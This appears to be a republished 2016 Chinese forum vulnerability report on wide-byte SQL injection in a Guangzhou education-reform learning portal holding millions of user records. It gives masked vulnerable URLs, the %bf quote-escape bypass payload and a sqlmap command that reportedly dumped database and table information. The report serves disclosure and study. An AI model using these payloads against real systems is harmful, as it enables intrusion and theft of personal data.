HanDs
管理员

[7月漏洞公开] 国家教育改革试点项目广州数字化学习港某系统多处宽字节SQL注入漏洞打包(涉及338w+用户信息) 



RT
国家教育改革试点项目
广州市政府重点工程

详细说明:

主站首页:http://**.**.**.**/index.do

漏洞链接:

code 区域
http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446



随手提交:

code 区域
' and ''='



1.png



发现可以注入,但是应该是开启了gpc,引号被转义了,想到宽字节绕过

然后可以用%bf、%c0等宽字节,让引号暴露出来

code 区域
http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446%bf'and--

如图:

2.png



本来想手工报出数据的,结果Oracle数据库在字符串这块卡住了。。。先这样吧 以后再研究Oracle报错

漏洞url1、

code 区域
http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446



payload:

code 区域
http://**.**.**.**/news.do?id=2cd178daff504790a3c1baf2108db446%bf'and--



2.png



漏洞url2、

code 区域
http://**.**.**.**/website.do?service=&area=&page=4



3.png



漏洞url3、

code 区域
http://**.**.**.**/jycs-index.do?learncenter_id=0982d2ac9663437e8c87acf0218e934e



4.png



漏洞url4、

code 区域
http://**.**.**.**/news-page.do?id=c490e04322484533bb3521bf09125d72
构造为:
http://**.**.**.**/news-page.do?id=c490e04322484533bb3521bf09125d72%bf'and--



5.png

漏洞证明:

注入手段类似,拿其中一个url做演示,证明危害

例:

code 区域
http://**.**.**.**/news.do?id=202e8519b623486e823abf7428c39c71



code 区域
sqlmap.py --batch -u "http://**.**.**.**/news.do?id=202e8519b623486e823abf7428c39c71%bf" --suffix="--"



SQL-1.png



数据库信息

SQL-2.png



表信息

SQL-4.png



数据量信息

SQL-3.png

修复方案:

过滤


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
国家 教育改革 试点 项目 广州 数字化 学习 系统 字节 S QL
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复